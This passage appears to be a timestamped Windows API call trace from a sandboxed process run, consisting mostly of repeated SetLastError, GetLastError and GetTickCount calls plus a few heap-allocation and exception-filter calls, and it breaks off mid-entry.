[0087.886] SetLastError (dwErrCode=0x0) [0087.886] GetLastError () returned 0x0 [0087.886] SetLastError (dwErrCode=0x0) [0087.886] GetLastError () returned 0x0 [0087.886] SetLastError (dwErrCode=0x0) [0087.886] GetLastError () returned 0x0 [0087.886] SetLastError (dwErrCode=0x0) [0087.886] GetLastError () returned 0x0 [0087.886] SetLastError (dwErrCode=0x0) [0087.886] GetLastError () returned 0x0 [0087.886] SetLastError (dwErrCode=0x0) [0087.886] GetLastError () returned 0x0 [0087.886] SetLastError (dwErrCode=0x0) [0087.886] GetLastError () returned 0x0 [0087.886] SetLastError (dwErrCode=0x0) [0087.886] GetLastError () returned 0x0 [0087.886] SetLastError (dwErrCode=0x0) [0087.886] GetLastError () returned 0x0 [0087.887] SetLastError (dwErrCode=0x0) [0087.887] GetLastError () returned 0x0 [0087.887] SetLastError (dwErrCode=0x0) [0087.887] GetLastError () returned 0x0 [0087.887] SetLastError (dwErrCode=0x0) [0087.887] GetLastError () returned 0x0 [0087.887] SetLastError (dwErrCode=0x0) [0087.887] GetLastError () returned 0x0 [0087.887] SetLastError (dwErrCode=0x0) [0087.887] GetLastError () returned 0x0 [0087.887] SetLastError (dwErrCode=0x0) [0087.887] GetLastError () returned 0x0 [0087.887] SetLastError (dwErrCode=0x0) [0087.887] GetLastError () returned 0x0 [0087.887] SetLastError (dwErrCode=0x0) [0087.887] GetLastError () returned 0x0 [0087.887] SetLastError (dwErrCode=0x0) [0087.887] GetLastError () returned 0x0 [0087.888] SetLastError (dwErrCode=0x0) [0087.888] GetLastError () returned 0x0 [0087.888] SetLastError (dwErrCode=0x0) [0087.888] GetLastError () returned 0x0 [0087.888] SetLastError (dwErrCode=0x0) [0087.888] GetLastError () returned 0x0 [0087.888] SetLastError (dwErrCode=0x0) [0087.888] GetLastError () returned 0x0 [0087.888] SetLastError (dwErrCode=0x0) [0087.888] GetLastError () returned 0x0 [0087.889] SetLastError (dwErrCode=0x0) [0087.889] GetLastError () returned 0x0 [0087.889] SetLastError (dwErrCode=0x0) [0087.889] GetLastError () returned 0x0 [0087.889] SetLastError (dwErrCode=0x0) [0087.889] GetLastError () returned 0x0 [0087.889] SetLastError (dwErrCode=0x0) [0087.889] GetLastError () returned 0x0 [0087.889] SetLastError (dwErrCode=0x0) [0087.889] GetLastError () returned 0x0 [0087.889] SetLastError (dwErrCode=0x0) [0087.889] GetLastError () returned 0x0 [0087.890] SetLastError (dwErrCode=0x0) [0087.890] GetLastError () returned 0x0 [0087.890] SetLastError (dwErrCode=0x0) [0087.890] GetLastError () returned 0x0 [0087.890] SetLastError (dwErrCode=0x0) [0087.890] GetLastError () returned 0x0 [0087.890] SetLastError (dwErrCode=0x0) [0087.890] GetLastError () returned 0x0 [0087.890] SetLastError (dwErrCode=0x0) [0087.890] GetLastError () returned 0x0 [0087.890] SetLastError (dwErrCode=0x0) [0087.890] GetLastError () returned 0x0 [0087.890] SetLastError (dwErrCode=0x0) [0087.890] GetLastError () returned 0x0 [0087.890] SetLastError (dwErrCode=0x0) [0087.890] GetLastError () returned 0x0 [0087.890] SetLastError (dwErrCode=0x0) [0087.890] GetLastError () returned 0x0 [0087.891] SetLastError (dwErrCode=0x0) [0087.891] GetLastError () returned 0x0 [0087.891] SetLastError (dwErrCode=0x0) [0087.891] GetLastError () returned 0x0 [0087.891] SetLastError (dwErrCode=0x0) [0087.891] GetLastError () returned 0x0 [0087.891] SetLastError (dwErrCode=0x0) [0087.891] GetLastError () returned 0x0 [0087.891] SetLastError (dwErrCode=0x0) [0087.891] GetLastError () returned 0x0 [0087.891] SetLastError (dwErrCode=0x0) [0087.891] GetLastError () returned 0x0 [0087.891] SetLastError (dwErrCode=0x0) [0087.891] GetLastError () returned 0x0 [0087.891] SetLastError (dwErrCode=0x0) [0087.891] GetLastError () returned 0x0 [0087.891] SetLastError (dwErrCode=0x0) [0087.891] GetLastError () returned 0x0 [0087.891] SetLastError (dwErrCode=0x0) [0087.892] GetLastError () returned 0x0 [0087.892] SetLastError (dwErrCode=0x0) [0087.892] GetLastError () returned 0x0 [0087.892] SetLastError (dwErrCode=0x0) [0087.892] GetLastError () returned 0x0 [0087.892] SetLastError (dwErrCode=0x0) [0087.892] GetLastError () returned 0x0 [0087.892] SetLastError (dwErrCode=0x0) [0087.892] GetLastError () returned 0x0 [0087.892] SetLastError (dwErrCode=0x0) [0087.892] GetLastError () returned 0x0 [0087.892] SetLastError (dwErrCode=0x0) [0087.892] GetLastError () returned 0x0 [0087.892] SetLastError (dwErrCode=0x0) [0087.892] GetLastError () returned 0x0 [0087.892] SetLastError (dwErrCode=0x0) [0087.892] GetLastError () returned 0x0 [0087.892] SetLastError (dwErrCode=0x0) [0087.892] GetLastError () returned 0x0 [0087.893] SetLastError (dwErrCode=0x0) [0087.893] GetLastError () returned 0x0 [0087.893] SetLastError (dwErrCode=0x0) [0087.893] GetLastError () returned 0x0 [0087.893] SetLastError (dwErrCode=0x0) [0087.893] GetLastError () returned 0x0 [0087.893] SetLastError (dwErrCode=0x0) [0087.893] GetLastError () returned 0x0 [0087.893] SetLastError (dwErrCode=0x0) [0087.893] GetLastError () returned 0x0 [0087.893] SetLastError (dwErrCode=0x0) [0087.893] GetLastError () returned 0x0 [0087.893] SetLastError (dwErrCode=0x0) [0087.893] GetLastError () returned 0x0 [0087.893] SetLastError (dwErrCode=0x0) [0087.893] GetLastError () returned 0x0 [0087.893] SetLastError (dwErrCode=0x0) [0087.893] GetLastError () returned 0x0 [0087.894] SetLastError (dwErrCode=0x0) [0087.894] GetLastError () returned 0x0 [0087.894] SetLastError (dwErrCode=0x0) [0087.894] GetLastError () returned 0x0 [0087.894] SetLastError (dwErrCode=0x0) [0087.894] GetLastError () returned 0x0 [0087.894] SetLastError (dwErrCode=0x0) [0087.894] GetLastError () returned 0x0 [0087.894] SetLastError (dwErrCode=0x0) [0087.894] GetLastError () returned 0x0 [0087.894] SetLastError (dwErrCode=0x0) [0087.894] GetLastError () returned 0x0 [0087.894] SetLastError (dwErrCode=0x0) [0087.894] GetLastError () returned 0x0 [0087.894] SetLastError (dwErrCode=0x0) [0087.894] GetLastError () returned 0x0 [0087.894] SetLastError (dwErrCode=0x0) [0087.894] GetLastError () returned 0x0 [0087.894] SetLastError (dwErrCode=0x0) [0087.895] GetLastError () returned 0x0 [0087.895] SetLastError (dwErrCode=0x0) [0087.895] GetLastError () returned 0x0 [0087.895] SetLastError (dwErrCode=0x0) [0087.895] GetLastError () returned 0x0 [0087.895] SetLastError (dwErrCode=0x0) [0087.895] GetLastError () returned 0x0 [0087.895] SetLastError (dwErrCode=0x0) [0087.895] GetLastError () returned 0x0 [0087.895] SetLastError (dwErrCode=0x0) [0087.895] GetLastError () returned 0x0 [0087.895] SetLastError (dwErrCode=0x0) [0087.895] GetLastError () returned 0x0 [0087.895] SetLastError (dwErrCode=0x0) [0087.895] GetLastError () returned 0x0 [0087.895] SetLastError (dwErrCode=0x0) [0087.895] GetLastError () returned 0x0 [0087.895] SetLastError (dwErrCode=0x0) [0087.895] GetLastError () returned 0x0 [0087.896] SetLastError (dwErrCode=0x0) [0087.896] GetLastError () returned 0x0 [0087.896] SetLastError (dwErrCode=0x0) [0087.896] GetLastError () returned 0x0 [0087.896] SetLastError (dwErrCode=0x0) [0087.896] GetLastError () returned 0x0 [0087.896] SetLastError (dwErrCode=0x0) [0087.896] GetLastError () returned 0x0 [0087.896] SetLastError (dwErrCode=0x0) [0087.896] GetLastError () returned 0x0 [0087.896] SetLastError (dwErrCode=0x0) [0087.896] GetLastError () returned 0x0 [0087.896] SetLastError (dwErrCode=0x0) [0087.896] GetLastError () returned 0x0 [0087.896] SetLastError (dwErrCode=0x0) [0087.896] GetLastError () returned 0x0 [0087.896] SetLastError (dwErrCode=0x0) [0087.896] GetLastError () returned 0x0 [0087.897] SetLastError (dwErrCode=0x0) [0087.897] GetLastError () returned 0x0 [0087.897] SetLastError (dwErrCode=0x0) [0087.897] GetLastError () returned 0x0 [0087.897] SetLastError (dwErrCode=0x0) [0087.897] GetLastError () returned 0x0 [0087.897] SetLastError (dwErrCode=0x0) [0087.897] GetLastError () returned 0x0 [0087.897] SetLastError (dwErrCode=0x0) [0087.897] GetLastError () returned 0x0 [0087.897] SetLastError (dwErrCode=0x0) [0087.897] GetLastError () returned 0x0 [0087.897] SetLastError (dwErrCode=0x0) [0087.897] GetLastError () returned 0x0 [0087.897] SetLastError (dwErrCode=0x0) [0087.897] GetLastError () returned 0x0 [0087.897] SetLastError (dwErrCode=0x0) [0087.897] GetLastError () returned 0x0 [0087.897] SetLastError (dwErrCode=0x0) [0087.898] GetLastError () returned 0x0 [0087.898] SetLastError (dwErrCode=0x0) [0087.898] GetLastError () returned 0x0 [0087.898] SetLastError (dwErrCode=0x0) [0087.898] GetLastError () returned 0x0 [0087.898] SetLastError (dwErrCode=0x0) [0087.898] GetLastError () returned 0x0 [0087.898] SetLastError (dwErrCode=0x0) [0087.898] GetLastError () returned 0x0 [0087.898] SetLastError (dwErrCode=0x0) [0087.898] GetLastError () returned 0x0 [0087.898] SetLastError (dwErrCode=0x0) [0087.898] GetLastError () returned 0x0 [0087.898] SetLastError (dwErrCode=0x0) [0087.898] GetLastError () returned 0x0 [0087.898] SetLastError (dwErrCode=0x0) [0087.898] GetLastError () returned 0x0 [0087.898] SetLastError (dwErrCode=0x0) [0087.898] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0xdb) returned 0x6e1990 [0087.898] GetLastError () returned 0x0 [0087.899] SetLastError (dwErrCode=0x0) [0087.899] GetLastError () returned 0x0 [0087.899] SetLastError (dwErrCode=0x0) [0087.899] GetLastError () returned 0x0 [0087.899] SetLastError (dwErrCode=0x0) [0087.899] GetLastError () returned 0x0 [0087.899] SetLastError (dwErrCode=0x0) [0087.899] GetLastError () returned 0x0 [0087.899] SetLastError (dwErrCode=0x0) [0087.899] GetLastError () returned 0x0 [0087.899] SetLastError (dwErrCode=0x0) [0087.899] GetLastError () returned 0x0 [0087.899] SetLastError (dwErrCode=0x0) [0087.899] GetLastError () returned 0x0 [0087.899] SetLastError (dwErrCode=0x0) [0087.899] GetLastError () returned 0x0 [0087.899] SetLastError (dwErrCode=0x0) [0087.899] GetLastError () returned 0x0 [0087.900] SetLastError (dwErrCode=0x0) [0087.900] GetLastError () returned 0x0 [0087.900] SetLastError (dwErrCode=0x0) [0087.900] GetLastError () returned 0x0 [0087.900] SetLastError (dwErrCode=0x0) [0087.900] GetLastError () returned 0x0 [0087.900] SetLastError (dwErrCode=0x0) [0087.900] GetLastError () returned 0x0 [0087.900] SetLastError (dwErrCode=0x0) [0087.900] GetLastError () returned 0x0 [0087.900] SetLastError (dwErrCode=0x0) [0087.900] GetLastError () returned 0x0 [0087.900] SetLastError (dwErrCode=0x0) [0087.900] GetLastError () returned 0x0 [0087.900] SetLastError (dwErrCode=0x0) [0087.900] GetLastError () returned 0x0 [0087.900] SetLastError (dwErrCode=0x0) [0087.900] GetLastError () returned 0x0 [0087.901] SetLastError (dwErrCode=0x0) [0087.901] GetLastError () returned 0x0 [0087.901] SetLastError (dwErrCode=0x0) [0087.901] GetLastError () returned 0x0 [0087.901] SetLastError (dwErrCode=0x0) [0087.901] GetLastError () returned 0x0 [0087.901] SetLastError (dwErrCode=0x0) [0087.901] GetLastError () returned 0x0 [0087.901] SetLastError (dwErrCode=0x0) [0087.901] GetLastError () returned 0x0 [0087.901] SetLastError (dwErrCode=0x0) [0087.901] GetLastError () returned 0x0 [0087.901] SetLastError (dwErrCode=0x0) [0087.901] GetLastError () returned 0x0 [0087.901] SetLastError (dwErrCode=0x0) [0087.901] GetLastError () returned 0x0 [0087.901] SetLastError (dwErrCode=0x0) [0087.901] GetLastError () returned 0x0 [0087.901] SetLastError (dwErrCode=0x0) [0087.901] GetLastError () returned 0x0 [0087.902] SetLastError (dwErrCode=0x0) [0087.902] GetLastError () returned 0x0 [0087.902] SetLastError (dwErrCode=0x0) [0087.902] GetLastError () returned 0x0 [0087.902] SetLastError (dwErrCode=0x0) [0087.902] GetLastError () returned 0x0 [0087.902] SetLastError (dwErrCode=0x0) [0087.902] GetLastError () returned 0x0 [0087.902] SetLastError (dwErrCode=0x0) [0087.902] GetLastError () returned 0x0 [0087.902] SetLastError (dwErrCode=0x0) [0087.902] GetLastError () returned 0x0 [0087.902] SetLastError (dwErrCode=0x0) [0087.902] GetLastError () returned 0x0 [0087.902] SetLastError (dwErrCode=0x0) [0087.902] GetLastError () returned 0x0 [0087.902] SetLastError (dwErrCode=0x0) [0087.902] GetLastError () returned 0x0 [0087.903] SetLastError (dwErrCode=0x0) [0087.903] GetLastError () returned 0x0 [0087.903] SetLastError (dwErrCode=0x0) [0087.903] GetLastError () returned 0x0 [0087.903] SetLastError (dwErrCode=0x0) [0087.903] GetLastError () returned 0x0 [0087.903] SetLastError (dwErrCode=0x0) [0087.903] GetLastError () returned 0x0 [0087.903] SetLastError (dwErrCode=0x0) [0087.903] GetLastError () returned 0x0 [0087.903] SetLastError (dwErrCode=0x0) [0087.903] GetLastError () returned 0x0 [0087.903] SetLastError (dwErrCode=0x0) [0087.903] GetLastError () returned 0x0 [0087.903] SetLastError (dwErrCode=0x0) [0087.903] GetLastError () returned 0x0 [0087.903] SetLastError (dwErrCode=0x0) [0087.903] GetLastError () returned 0x0 [0087.914] IsProcessorFeaturePresent (ProcessorFeature=0x0) returned 0 [0087.915] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4037ad) returned 0x0 [0087.941] lstrlenA (lpString="") returned 0 [0087.942] GetLastError () returned 0x0 [0087.942] GetTickCount () returned 0x114b1d2 [0087.942] GetLastError () returned 0x0 [0087.942] GetTickCount () returned 0x114b1d2 [0087.942] GetLastError () returned 0x0 [0087.942] GetTickCount () returned 0x114b1d2 [0087.942] GetLastError () returned 0x0 [0087.942] GetTickCount () returned 0x114b1d2 [0087.942] GetLastError () returned 0x0 [0087.942] GetTickCount () returned 0x114b1d2 [0087.942] GetLastError () returned 0x0 [0087.942] GetTickCount () returned 0x114b1d2 [0087.942] GetLastError () returned 0x0 [0087.942] GetTickCount () returned 0x114b1d2 [0087.942] GetLastError () returned 0x0 [0087.942] GetTickCount () returned 0x114b1d2 [0087.942] GetLastError () returned 0x0 [0087.942] GetTickCount () returned 0x114b1d2 [0087.942] GetLastError () returned 0x0 [0087.942] GetTickCount () returned 0x114b1d2 [0087.942] GetLastError () returned 0x0 [0087.942] GetTickCount () returned 0x114b1d2 [0087.942] GetLastError () returned 0x0 [0087.942] GetTickCount () returned 0x114b1d2 [0087.942] GetLastError () returned 0x0 [0087.942] GetTickCount () returned 0x114b1d2 [0087.942] GetLastError () returned 0x0 [0087.942] GetTickCount () returned 0x114b1d2 [0087.942] GetLastError () returned 0x0 [0087.942] GetTickCount () returned 0x114b1d2 [0087.942] GetLastError () returned 0x0 [0087.943] GetTickCount () returned 0x114b1d2 [0087.943] GetLastError () returned 0x0 [0087.943] GetTickCount () returned 0x114b1d2 [0087.943] GetLastError () returned 0x0 [0087.943] GetTickCount () returned 0x114b1d2 [0087.943] GetLastError () returned 0x0 [0087.943] GetTickCount () returned 0x114b1d2 [0087.943] GetLastError () returned 0x0 [0087.943] GetTickCount () returned 0x114b1d2 [0087.943] GetLastError () returned 0x0 [0087.943] GetTickCount () returned 0x114b1d2 [0087.943] GetLastError () returned 0x0 [0087.943] GetTickCount () returned 0x114b1d2 [0087.943] GetLastError () returned 0x0 [0087.943] GetTickCount () returned 0x114b1d2 [0087.943] GetLastError () returned 0x0 [0087.943] GetTickCount () returned 0x114b1d2 [0087.943] GetLastError () returned 0x0 [0087.943] GetTickCount () returned 0x114b1d2 [0087.943] GetLastError () returned 0x0 [0087.943] GetTickCount () returned 0x114b1d2 [0087.943] GetLastError () returned 0x0 [0087.943] GetTickCount () returned 0x114b1d2 [0087.943] GetLastError () returned 0x0 [0087.943] GetTickCount () returned 0x114b1d2 [0087.943] GetLastError () returned 0x0 [0087.943] GetTickCount () returned 0x114b1d2 [0087.943] GetLastError () returned 0x0 [0087.943] GetTickCount () returned 0x114b1d2 [0087.943] GetLastError () returned 0x0 [0087.943] GetTickCount () returned 0x114b1d2 [0087.943] GetLastError () returned 0x0 [0087.943] GetTickCount () returned 0x114b1d2 [0087.943] GetLastError () returned 0x0 [0087.943] GetTickCount () returned 0x114b1d2 [0087.944] GetLastError () returned 0x0 [0087.944] GetTickCount () returned 0x114b1d2 [0087.944] GetLastError () returned 0x0 [0087.944] GetTickCount () returned 0x114b1d2 [0087.944] GetLastError () returned 0x0 [0087.944] GetTickCount () returned 0x114b1d2 [0087.944] GetLastError () returned 0x0 [0087.944] GetTickCount () returned 0x114b1d2 [0087.944] GetLastError () returned 0x0 [0087.944] GetTickCount () returned 0x114b1d2 [0087.944] GetLastError () returned 0x0 [0087.944] GetTickCount () returned 0x114b1d2 [0087.944] GetLastError () returned 0x0 [0087.944] GetTickCount () returned 0x114b1d2 [0087.944] GetLastError () returned 0x0 [0087.944] GetTickCount () returned 0x114b1d2 [0087.944] GetLastError () returned 0x0 [0087.944] GetTickCount () returned 0x114b1d2 [0087.944] GetLastError () returned 0x0 [0087.944] GetTickCount () returned 0x114b1d2 [0087.944] GetLastError () returned 0x0 [0087.944] GetTickCount () returned 0x114b1d2 [0087.944] GetLastError () returned 0x0 [0087.944] GetTickCount () returned 0x114b1d2 [0087.944] GetLastError () returned 0x0 [0087.944] GetTickCount () returned 0x114b1d2 [0087.944] GetLastError () returned 0x0 [0087.944] GetTickCount () returned 0x114b1d2 [0087.944] GetLastError () returned 0x0 [0087.944] GetTickCount () returned 0x114b1d2 [0087.944] GetLastError () returned 0x0 [0087.944] GetTickCount () returned 0x114b1d2 [0087.944] GetLastError () returned 0x0 [0087.944] GetTickCount () returned 0x114b1d2 [0087.945] GetLastError () returned 0x0 [0087.945] GetTickCount () returned 0x114b1d2 [0087.945] GetLastError () returned 0x0 [0087.945] GetTickCount () returned 0x114b1d2 [0087.945] GetLastError () returned 0x0 [0087.945] GetTickCount () returned 0x114b1d2 [0087.945] GetLastError () returned 0x0 [0087.945] GetTickCount () returned 0x114b1d2 [0087.945] GetLastError () returned 0x0 [0087.945] GetTickCount () returned 0x114b1d2 [0087.945] GetLastError () returned 0x0 [0087.945] GetTickCount () returned 0x114b1d2 [0087.945] GetLastError () returned 0x0 [0087.945] GetTickCount () returned 0x114b1d2 [0087.945] GetLastError () returned 0x0 [0087.945] GetTickCount () returned 0x114b1d2 [0087.945] GetLastError () returned 0x0 [0087.945] GetTickCount () returned 0x114b1d2 [0087.945] GetLastError () returned 0x0 [0087.945] GetTickCount () returned 0x114b1d2 [0087.945] GetLastError () returned 0x0 [0087.945] GetTickCount () returned 0x114b1d2 [0087.945] GetLastError () returned 0x0 [0087.945] GetTickCount () returned 0x114b1d2 [0087.945] GetLastError () returned 0x0 [0087.945] GetTickCount () returned 0x114b1d2 [0087.945] GetLastError () returned 0x0 [0087.945] GetTickCount () returned 0x114b1d2 [0087.945] GetLastError () returned 0x0 [0087.945] GetTickCount () returned 0x114b1d2 [0087.945] GetLastError () returned 0x0 [0087.945] GetTickCount () returned 0x114b1d2 [0087.945] GetLastError () returned 0x0 [0087.945] GetTickCount () returned 0x114b1d2 [0087.946] GetLastError () returned 0x0 [0087.946] GetTickCount () returned 0x114b1d2 [0087.946] GetLastError () returned 0x0 [0087.946] GetTickCount () returned 0x114b1d2 [0087.946] GetLastError () returned 0x0 [0087.946] GetTickCount () returned 0x114b1d2 [0087.946] GetLastError () returned 0x0 [0087.946] GetTickCount () returned 0x114b1d2 [0087.946] GetLastError () returned 0x0 [0087.946] GetTickCount () returned 0x114b1d2 [0087.946] GetLastError () returned 0x0 [0087.946] GetTickCount () returned 0x114b1d2 [0087.946] GetLastError () returned 0x0 [0087.946] GetTickCount () returned 0x114b1d2 [0087.946] GetLastError () returned 0x0 [0087.946] GetTickCount () returned 0x114b1d2 [0087.946] GetLastError () returned 0x0 [0087.946] GetTickCount () returned 0x114b1d2 [0087.946] GetLastError () returned 0x0 [0087.946] GetTickCount () returned 0x114b1d2 [0087.946] GetLastError () returned 0x0 [0087.946] GetTickCount () returned 0x114b1d2 [0087.946] GetLastError () returned 0x0 [0087.946] GetTickCount () returned 0x114b1d2 [0087.946] GetLastError () returned 0x0 [0087.946] GetTickCount () returned 0x114b1d2 [0087.946] GetLastError () returned 0x0 [0087.946] GetTickCount () returned 0x114b1d2 [0087.946] GetLastError () returned 0x0 [0087.946] GetTickCount () returned 0x114b1d2 [0087.946] GetLastError () returned 0x0 [0087.946] GetTickCount () returned 0x114b1d2 [0087.946] GetLastError () returned 0x0 [0087.946] GetTickCount () returned 0x114b1d2 [0087.947] GetLastError () returned 0x0 [0087.947] GetTickCount () returned 0x114b1d2 [0087.947] GetLastError () returned 0x0 [0087.947] GetTickCount () returned 0x114b1d2 [0087.947] GetLastError () returned 0x0 [0087.947] GetTickCount () returned 0x114b1d2 [0087.947] GetLastError () returned 0x0 [0087.947] GetTickCount () returned 0x114b1d2 [0087.947] GetLastError () returned 0x0 [0087.947] GetTickCount () returned 0x114b1d2 [0087.947] GetLastError () returned 0x0 [0087.947] GetTickCount () returned 0x114b1d2 [0087.947] GetLastError () returned 0x0 [0087.947] GetTickCount () returned 0x114b1d2 [0087.947] GetLastError () returned 0x0 [0087.947] GetTickCount () returned 0x114b1d2 [0087.947] GetLastError () returned 0x0 [0087.947] GetTickCount () returned 0x114b1d2 [0087.947] GetLastError () returned 0x0 [0087.947] GetTickCount () returned 0x114b1d2 [0087.947] GetLastError () returned 0x0 [0087.947] GetTickCount () returned 0x114b1d2 [0087.947] GetLastError () returned 0x0 [0087.947] GetTickCount () returned 0x114b1d2 [0087.947] GetLastError () returned 0x0 [0087.947] GetTickCount () returned 0x114b1d2 [0087.947] GetLastError () returned 0x0 [0087.947] GetTickCount () returned 0x114b1d2 [0087.947] GetLastError () returned 0x0 [0087.947] GetTickCount () returned 0x114b1d2 [0087.947] GetLastError () returned 0x0 [0087.947] GetTickCount () returned 0x114b1d2 [0087.947] GetLastError () returned 0x0 [0087.947] GetTickCount () returned 0x114b1d2 [0087.947] GetLastError () returned 0x0 [0087.948] GetTickCount () returned 0x114b1d2 [0087.948] GetLastError () returned 0x0 [0087.948] GetTickCount () returned 0x114b1d2 [0087.948] GetLastError () returned 0x0 [0087.948] GetTickCount () returned 0x114b1d2 [0087.948] GetLastError () returned 0x0 [0087.948] GetTickCount () returned 0x114b1d2 [0087.948] GetLastError () returned 0x0 [0087.948] GetTickCount () returned 0x114b1d2 [0087.948] GetLastError () returned 0x0 [0087.948] GetTickCount () returned 0x114b1d2 [0087.948] GetLastError () returned 0x0 [0087.948] GetTickCount () returned 0x114b1d2 [0087.948] GetLastError () returned 0x0 [0087.948] GetTickCount () returned 0x114b1d2 [0087.948] GetLastError () returned 0x0 [0087.948] GetTickCount () returned 0x114b1d2 [0087.948] GetLastError () returned 0x0 [0087.948] GetTickCount () returned 0x114b1d2 [0087.948] GetLastError () returned 0x0 [0087.948] GetTickCount () returned 0x114b1d2 [0087.948] GetLastError () returned 0x0 [0087.948] GetTickCount () returned 0x114b1d2 [0087.948] GetLastError () returned 0x0 [0087.948] GetTickCount () returned 0x114b1d2 [0087.948] GetLastError () returned 0x0 [0087.948] GetTickCount () returned 0x114b1d2 [0087.948] GetLastError () returned 0x0 [0087.948] GetTickCount () returned 0x114b1d2 [0087.948] GetLastError () returned 0x0 [0087.948] GetTickCount () returned 0x114b1d2 [0087.948] GetLastError () returned 0x0 [0087.948] GetTickCount () returned 0x114b1d2 [0087.948] GetLastError () returned 0x0 [0087.949] GetTickCount () returned 0x114b1d2 [0087.949] GetLastError () returned 0x0 [0087.949] GetTickCount () returned 0x114b1d2 [0087.949] GetLastError () returned 0x0 [0087.949] GetTickCount () returned 0x114b1d2 [0087.949] GetLastError () returned 0x0 [0087.949] GetTickCount () returned 0x114b1d2 [0087.949] GetLastError () returned 0x0 [0087.949] GetTickCount () returned 0x114b1d2 [0087.949] GetLastError () returned 0x0 [0087.949] GetTickCount () returned 0x114b1d2 [0087.949] GetLastError () returned 0x0 [0087.949] GetTickCount () returned 0x114b1d2 [0087.949] GetLastError () returned 0x0 [0087.949] GetTickCount () returned 0x114b1d2 [0087.949] GetLastError () returned 0x0 [0087.949] GetTickCount () returned 0x114b1d2 [0087.949] GetLastError () returned 0x0 [0087.949] GetTickCount () returned 0x114b1d2 [0087.949] GetLastError () returned 0x0 [0087.949] GetTickCount () returned 0x114b1d2 [0087.949] GetLastError () returned 0x0 [0087.949] GetTickCount () returned 0x114b1d2 [0087.949] GetLastError () returned 0x0 [0087.949] GetTickCount () returned 0x114b1d2 [0087.949] GetLastError () returned 0x0 [0087.949] GetTickCount () returned 0x114b1d2 [0087.949] GetLastError () returned 0x0 [0087.949] GetTickCount () returned 0x114b1d2 [0087.949] GetLastError () returned 0x0 [0087.949] GetTickCount () returned 0x114b1d2 [0087.949] GetLastError () returned 0x0 [0087.949] GetTickCount () returned 0x114b1d2 [0087.949] GetLastError () returned 0x0 [0087.950] GetTickCount () returned 0x114b1d2 [0087.950] GetLastError () returned 0x0 [0087.950] GetTickCount () returned 0x114b1d2 [0087.950] GetLastError () returned 0x0 [0087.950] GetTickCount () returned 0x114b1d2 [0087.950] GetLastError () returned 0x0 [0087.950] GetTickCount () returned 0x114b1d2 [0087.950] GetLastError () returned 0x0 [0087.950] GetTickCount () returned 0x114b1d2 [0087.950] GetLastError () returned 0x0 [0087.950] GetTickCount () returned 0x114b1d2 [0087.950] GetLastError () returned 0x0 [0087.950] GetTickCount () returned 0x114b1d2 [0087.950] GetLastError () returned 0x0 [0087.950] GetTickCount () returned 0x114b1d2 [0087.950] GetLastError () returned 0x0 [0087.950] GetTickCount () returned 0x114b1d2 [0087.950] GetLastError () returned 0x0 [0087.950] GetTickCount () returned 0x114b1d2 [0087.950] GetLastError () returned 0x0 [0087.950] GetTickCount () returned 0x114b1d2 [0087.950] GetLastError () returned 0x0 [0087.950] GetTickCount () returned 0x114b1d2 [0087.950] GetLastError () returned 0x0 [0087.950] GetTickCount () returned 0x114b1d2 [0087.950] GetLastError () returned 0x0 [0087.950] GetTickCount () returned 0x114b1d2 [0087.950] GetLastError () returned 0x0 [0087.950] GetTickCount () returned 0x114b1d2 [0087.950] GetLastError () returned 0x0 [0087.950] GetTickCount () returned 0x114b1e2 [0087.951] GetLastError () returned 0x0 [0087.951] GetTickCount () returned 0x114b1e2 [0087.951] GetLastError () returned 0x0 [0087.951] GetTickCount () returned 0x114b1e2 [0087.951] GetLastError () returned 0x0 [0087.951] GetTickCount () returned 0x114b1e2 [0087.951] GetLastError () returned 0x0 [0087.951] GetTickCount () returned 0x114b1e2 [0087.951] GetLastError () returned 0x0 [0087.951] GetTickCount () returned 0x114b1e2 [0087.951] GetLastError () returned 0x0 [0087.951] GetTickCount () returned 0x114b1e2 [0087.951] GetLastError () returned 0x0 [0087.951] GetTickCount () returned 0x114b1e2 [0087.951] GetLastError () returned 0x0 [0087.951] GetTickCount () returned 0x114b1e2 [0087.951] GetLastError () returned 0x0 [0087.952] GetTickCount () returned 0x114b1e2 [0087.952] GetLastError () returned 0x0 [0087.952] GetTickCount () returned 0x114b1e2 [0087.952] GetLastError () returned 0x0 [0087.952] GetTickCount () returned 0x114b1e2 [0087.952] GetLastError () returned 0x0 [0087.952] GetTickCount () returned 0x114b1e2 [0087.952] GetLastError () returned 0x0 [0087.952] GetTickCount () returned 0x114b1e2 [0087.952] GetLastError () returned 0x0 [0087.952] GetTickCount () returned 0x114b1e2 [0087.952] GetLastError () returned 0x0 [0087.952] GetTickCount () returned 0x114b1e2 [0087.952] GetLastError () returned 0x0 [0087.952] GetTickCount () returned 0x114b1e2 [0087.952] GetLastError () returned 0x0 [0087.952] GetTickCount () returned 0x114b1e2 [0087.952] GetLastError () returned 0x0 [0087.952] GetTickCount () returned 0x114b1e2 [0087.952] GetLastError () returned 0x0 [0087.952] GetTickCount () returned 0x114b1e2 [0087.952] GetLastError () returned 0x0 [0087.952] GetTickCount () returned 0x114b1e2 [0087.952] GetLastError () returned 0x0 [0087.952] GetTickCount () returned 0x114b1e2 [0087.952] GetLastError () returned 0x0 [0087.952] GetTickCount () returned 0x114b1e2 [0087.952] GetLastError () returned 0x0 [0087.952] GetTickCount () returned 0x114b1e2 [0087.952] GetLastError () returned 0x0 [0087.952] GetTickCount () returned 0x114b1e2 [0087.952] GetLastError () returned 0x0 [0087.952] GetTickCount () returned 0x114b1e2 [0087.952] GetLastError () returned 0x0 [0087.953] GetTickCount () returned 0x114b1e2 [0087.953] GetLastError () returned 0x0 [0087.953] GetTickCount () returned 0x114b1e2 [0087.953] GetLastError () returned 0x0 [0087.953] GetTickCount () returned 0x114b1e2 [0087.953] GetLastError () returned 0x0 [0087.953] GetTickCount () returned 0x114b1e2 [0087.953] GetLastError () returned 0x0 [0087.953] GetTickCount () returned 0x114b1e2 [0087.953] GetLastError () returned 0x0 [0087.953] GetTickCount () returned 0x114b1e2 [0087.953] GetLastError () returned 0x0 [0087.953] GetTickCount () returned 0x114b1e2 [0087.953] GetLastError () returned 0x0 [0087.953] GetTickCount () returned 0x114b1e2 [0087.953] GetLastError () returned 0x0 [0087.953] GetTickCount () returned 0x114b1e2 [0087.953] GetLastError () returned 0x0 [0087.953] GetTickCount () returned 0x114b1e2 [0087.953] GetLastError () returned 0x0 [0087.953] GetTickCount () returned 0x114b1e2 [0087.953] GetLastError () returned 0x0 [0087.953] GetTickCount () returned 0x114b1e2 [0087.953] GetLastError () returned 0x0 [0087.953] GetTickCount () returned 0x114b1e2 [0087.953] GetLastError () returned 0x0 [0087.953] 